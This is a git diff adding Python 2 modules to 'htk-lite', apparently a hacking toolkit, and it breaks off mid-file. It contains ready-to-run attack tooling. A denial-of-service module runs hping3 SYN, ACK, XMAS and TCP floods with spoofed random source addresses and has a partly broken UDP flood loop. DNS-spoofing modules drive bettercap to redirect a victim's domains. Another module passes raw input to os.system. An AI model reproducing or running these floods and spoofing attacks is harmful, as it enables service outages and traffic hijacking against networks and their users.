░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +import sys +import random +import socks +import socket +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] + +def aserver(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + print "\033[93mStarting Server\033[0m..." + os.system("service apache2 start") + br = raw_input("\033[92mBrowser: \033[0m") + a = '{0} {1}'.format(br,ipaddr) + os.system(a) + stop = raw_input("\033[1mhit enter to stop server:\033[0m ") + print "\033[93mStopping Server\033[0m..." + os.system("service apache2 stop") + +aserver() diff --git a/htk-lite/commandlist/banner.py b/htk-lite/commandlist/banner.py new file mode 100644 index 0000000..eecc4ae --- /dev/null +++ b/htk-lite/commandlist/banner.py @@ -0,0 +1,188 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +import sys +import random +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] + +def mainbanner1(): + print """\033[1;36m + ┬ ┬┌┬┐┌─┐\033[0m + │ │ │ ├┤ \033[1;36m + ┴─┘┴ ┴ └─┘ \033[0m +██╗ ██╗████████╗██╗ ██╗ +██║ ██║╚══██╔══╝██║ ██╔╝\033[1;36m +███████║ ██║ █████╔╝ \033[0m +██╔══██║ ██║ ██╔═██╗ +██║ ██║ ██║ ██║ ██╗ +╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ + \n""".decode('utf-8') + +def mainbanner2(): + print """ + ░░▒█████████ + ▒▓▓█████████████ + ░▓█████████████████████░ ░▒███▓ + ░▓██████████████████████████████████ + ░░▒▓▓▓███████████┬ ┬┌┬┐┌─┐████████████▓ + ░▓██████▓▓██████████│ │ │ ├┤ █████████████▓░ + ░▓██████▓███████▓██████┴─┘┴ ┴ └─┘████████████████░ + ░░▒░░░░▒▒▒▓▓░░▒███████████████████████████▓▓▓░ + ░░░▒░░░▒▓▓▒░▒▒░▒▓████████▓▓██▒▒░ + ░▒░░░░░░▒░░░░░░░ + \n""".decode('utf-8') + +def mainbanner3(): + print """ +╔═══════════════════════════════════════════════╗ +║ ║ +║ {0} ██░ ██ ▄▄▄█████▓ ██ ▄█▀ ██▓ \033[0m ║ +║ {1} ▓██░ ██▒▓ ██▒ ▓▒ ██▄█▒ ▓██▒ \033[0m ║ +║ {2} ▒██▀▀██░▒ ▓██░ ▒░▓███▄░ ▒██░ \033[0m ║ +║ {3} ░▓█ ░██ ░ ▓██▓ ░ ▓██ █▄ ▒██░ \033[0m║ +║ {4} ░▓█▒░██▓ ▒██▒ ░ ▒██▒ █▄░██████▒ \033[0m║ +║ {5} ▒ ░░▒░▒ ▒ ░░ ▒ ▒▒ ▓▒░ ▒░▓ ░ \033[0m║ +║ {6} ▒ ░▒░ ░ ░ ░ ░▒ ▒░░ ░ ▒ ░ \033[0m║ +║ {7} ░ ░░ ░ ░ ░ ░░ ░ ░ ░ \033[0m║ +║ {8} ░ ░ ░ ░ ░ ░ ░ \033[0m║ +║ ║ +║ ║ +╚═══════════════════════════════════════════════╝ + """.decode('utf-8').format(random.choice(banner3list), random.choice(banner3list), random.choice(banner3list), random.choice(banner3list), random.choice(banner3list), random.choice(banner3list), random.choice(banner3list), random.choice(banner3list), random.choice(banner3list)) + +def mainbanner4(): + print """\033[0m +████████████████████████████████████████████████████████████████████████████\033[91m +███ ███████ ██ █ ███ ███████ ████████ ██ ████████████\033[33m +████ ███████ ██████ █████ ██ █████████ █ █ █████████ ██ ██ ██████ ███\033[93m +████ █████ ███████ ██████ █████████████ ████████ ███ █████ ████\033[92m +████ ██████ █████ █████████████ ██████ █ █ ██ ██ █ █████ ███\033[94m +████ █████ ███████ ██████ █████████████ █████████ ████ ███ ███\033[1;36m +████ ███████ ███████ ██████ ██ ███████████ █████ ███ ████ ██ █ █████████\033[95m +███ █████ █████ ████ ███ ████████ ██ ███ ████ ███\033[0m +████████████████████████████████████████████████████████████████████████████ + \033[0m\n""".decode('utf-8') + +def mainbanner5(): + print """\033[92m + + █ ▄ ▄ █ ▄███▄ ▄██ ▄███▀ + ███ ███ ▄█████████▄ ███▐██▀ + ███ ███ ██▀▀███▀▀██ █████▀ + ███▄▄▄▄███ ▀ ███ ▀ ██████▄ + ███▀▀▀▀███ ▄ ███ ▄ ███▐██▄ + ███ ███ \033[0m┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ \033[92m███ \033[0m┌─┐┌─┐┬ \033[92m███ ▀███▄ \033[0m┬┌┬┐\033[92m + ███ ███ \033[0m├─┤│ ├┴┐├┤ ├┬┘└─┐ \033[92m███ \033[0m│ ││ ││ \033[92m███ ██ \033[0m│ │ \033[92m + █ █ \033[0m┴ ┴└─┘┴ ┴└─┘┴└─└─┘ \033[92m▀███▀ \033[0m└─┘└─┘┴─┘ \033[92m▀ ▀ \033[0m┴ ┴\033[92m + + + + ███ + █ █ + █ █ ██ ████████ ███████ + █ █ ██ ██ ██ + █ █ ██ ██ █████ + █ █ ▄ ██ ██ ██ + █████▄▄██ ██ ██ ███████ + + + """.decode('utf-8') + +def mainbanner6(): + print """ + • \033[35m▄█\033[0m . \033[35m█▄ \033[0m. \033[35m███ \033[0m. • \033[35m▄█ ▄█▄\033[0m. \033[35m▄█ \033[0m• + \033[35m█#█ █#█\033[0m• \033[35m▀████=████▄\033[0m. \033[35m███ ▄█ █▀ █⇣█ \033[0m. +. \033[35m█#█ \033[0m. •\033[35m█#█ \033[0m. \033[35m▀█-█▀▀██ \033[0m.\033[35m█ █▐ █▀ \033[0m• \033[35m█L█ \033[0m. + \033[35m▄███▄▄▄▄███▄▄ \033[0m. \033[35m█▪█ \033[0m. \033[35m▀ ▄█████▀ \033[0m.\033[35m█i█ +▀▀█+█▀▀▀▀█+█▀ \033[0m• \033[35m█▪█ \033[0m. \033[35m▀▀█ █ █▄\033[0m. \033[35m█t█ \033[0m. + .\033[35m█•█ \033[0m. \033[35m█•█ \033[0m. \033[35m█▪█ \033[0m• \033[35m███▐ █▄ \033[0m. \033[35m█e█ \033[0m. + \033[35m█+█ █+█ \033[0m. \033[35m█▪█ \033[0m. \033[35m█ █\033[0m.\033[35m▀█ █▄ █⇡█▌ \033[0m• \033[35m▄ +\033[0m• \033[35m███ \033[0m.\033[35m█▀ \033[0m. \033[35m ▄████▀ \033[0m. \033[35m███ \033[0m. \033[35m▀█▀ █████▄▄██ + \033[0m . . . . \033[35m▀ \033[0m•\033[35m▀\033[0m] + """.decode('utf-8') +def mainbanner7(): + print """\033[31m +██╗ ██╗████████╗██╗ ██╗ ██╗ ██╗████████╗███████╗ +██║ ██║╚\033[91m══██╔══╝██║ ██╔╝ ██║ ██║╚══██╔══╝██╔════╝ +███████║ ██║ █████╔╝████\033[33m█╗██║ ██║ ██║ █████╗ +██╔══██║ ██║ ██╔═██╗╚════╝\033[93m██║ ██║ ██║ ██╔══╝ +██║ ██║ ██║ ██║ ██╗ ███████╗██║ ██║ ███████╗ +╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ ╚══════╝\033[0m + """.decode('utf-8') + +def mainbanner8(): + print """\033[34m +██╗ ██╗████████╗██╗ ██╗ ██╗ ██╗████████╗███████╗ +██║ ██║╚══██╔══╝██║ ██╔╝ ██║ ██║╚══██╔══╝██╔════╝ +███████║ ██║ █████╔╝█████╗█\033[94m█║ ██║ ██║ █████╗ +██╔══██║ ██║ ██╔═██╗╚════╝██║ ██║ ██║ ██╔══╝ +██║ ██║ █\033[1;36m█║ ██║ ██╗ ███████╗██║ ██║ ███████╗ +╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ ╚══════╝ + \033[0m""".decode('utf-8') + +def mainbanner9(): + print """\033[93m +██╗ ██╗████████╗██╗ ██╗ ██╗ ██╗████████╗███████╗ +██║ ██║╚══██╔══╝██║ ██╔╝ ██║ ██║╚══██╔══╝██╔════╝ +███\033[92m████║ ██║ █████╔╝█████╗██║ ██║ ██║ █████╗ +██╔══██║ ██║ ██╔═██╗╚════╝\033[32m██║ ██║ ██║ ██╔══╝ +██║ ██║ ██║ ██║ ██╗ ███████╗██║ ██║ ███████╗ +╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ ╚══════╝ + \033[0m""".decode('utf-8') + +def mainbanner(): + import random + for x in range(10): + num = random.randint(1,9) + if num == 1: + mainbanner1() + if num == 2: + mainbanner2() + if num == 3: + mainbanner3() + if num == 4: + mainbanner4() + if num == 5: + mainbanner5() + if num == 6: + mainbanner6() + if num == 7: + mainbanner7() + if num == 8: + mainbanner8() + if num == 9: + mainbanner9() + +mainbanner() diff --git a/htk-lite/commandlist/clear.py b/htk-lite/commandlist/clear.py new file mode 100644 index 0000000..d80484e --- /dev/null +++ b/htk-lite/commandlist/clear.py @@ -0,0 +1,2 @@ +import os +os.system("clear") diff --git a/htk-lite/commandlist/command.py b/htk-lite/commandlist/command.py new file mode 100644 index 0000000..22af89e --- /dev/null +++ b/htk-lite/commandlist/command.py @@ -0,0 +1,43 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +import sys +import random +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] + +def command(): + command = raw_input("\033[1mCommand:\033[0m ") + os.system(command) +command() diff --git a/htk-lite/commandlist/dnsspoof-all.py b/htk-lite/commandlist/dnsspoof-all.py new file mode 100644 index 0000000..e1f8fbd --- /dev/null +++ b/htk-lite/commandlist/dnsspoof-all.py @@ -0,0 +1,52 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +import sys +import random +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] + +def dnsspoofall(): + domain1 = raw_input("\033[1mDomain1:\033[0m ") + domain2 = raw_input("\033[1mDomain2:\033[0m ") + os.system('echo "net.sniff on\n" >> dnsall.cap') + os.system('echo "set dns.spoof.domains {0},{1}\n" >> dnsall.cap'.format(domain1,domain2)) + os.system('echo "set dns.spoof.all true\n" >> dnsall.cap') + os.system('echo "dns.spoof on\n" >> dnsall.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet dnsall.cap") + os.system("rm dnsall.cap") + +dnsspoofall() diff --git a/htk-lite/commandlist/dnsspoof.py b/htk-lite/commandlist/dnsspoof.py new file mode 100644 index 0000000..9b81c4f --- /dev/null +++ b/htk-lite/commandlist/dnsspoof.py @@ -0,0 +1,53 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +import sys +import random +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] + +def dnsspoof(): + target = raw_input("\033[1mTarget:\033[0m ") + domain1 = raw_input("\033[1mDomain1:\033[0m ") + domain2 = raw_input("\033[1mDomain2:\033[0m ") + os.system('echo "net.sniff on\n" >> dns.cap') + os.system('echo "set dns.spoof.domains {0},{1}\n" >> dns.cap'.format(domain1,domain2)) + os.system('echo "set dns.spoof.address {0}\n" >> dns.cap'.format(target)) + os.system('echo "dns.spoof on\n" >> dns.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet dns.cap") + os.system("rm dns.cap") + +dnsspoof() diff --git a/htk-lite/commandlist/dos.py b/htk-lite/commandlist/dos.py new file mode 100644 index 0000000..f6fca63 --- /dev/null +++ b/htk-lite/commandlist/dos.py @@ -0,0 +1,87 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +import sys +import random +import socket +import socks +import requests +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] + +def dos(): + print """ +{0}tcp: * tcp target port +{1}udp: * udp target port +{2}syn: * syn target port +{3}ack: * ack target port +{4}xmas: * xmas target port +\033[0m +!Press CTRL C to stop attacking! + """.format(random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist)) + try: + command, target, port = raw_input("Method: ").split() + if command == "tcp": + os.system("service tor restart") + os.system("hping3 --flood -d 50000 --rand-source -p {0} {1}".format(port,target)) + if command == "udp": + try: + ip = socket.gethostbyname(target) + port = int(port) + os.system("service tor restart") + sent = 0 + while True: + print N+"UDP attack sending | {6}{5}\033[0m | {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year,ip,random.choice(colorlist)) + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + if port == 65534: + port = 1 + except: + print "\nUDP flood stopped\n" + os.system("") + if command == "syn": + os.system("service tor restart") + os.system("hping3 -S --flood -d 50000 --rand-source -p {0} {1}".format(port,target)) + if command == "ack": + os.system("service tor restart") + os.system("hping3 -A --flood -d 50000 --rand-source -p {0} {1}".format(port,target)) + if command == "xmas": + os.system("hping3 -X --flood -d 50000 --rand-source -p {0} {1}".format(port,target)) + except: + print "\n\033[91mError: Not Enough Arguments\033[0m\n " + +dos() diff --git a/htk-lite/commandlist/exit.py b/htk-lite/commandlist/exit.py new file mode 100644 index 0000000..38ab1bc --- /dev/null +++ b/htk-lite/commandlist/exit.py @@ -0,0 +1,2 @@ +import sys +sys.exit() diff --git a/htk-lite/commandlist/hashid.py b/htk-lite/commandlist/hashid.py new file mode 100644 index 0000000..8ccc5a2 --- /dev/null +++ b/htk-lite/commandlist/hashid.py @@ -0,0 +1,619 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +import sys +import random +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] + +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def 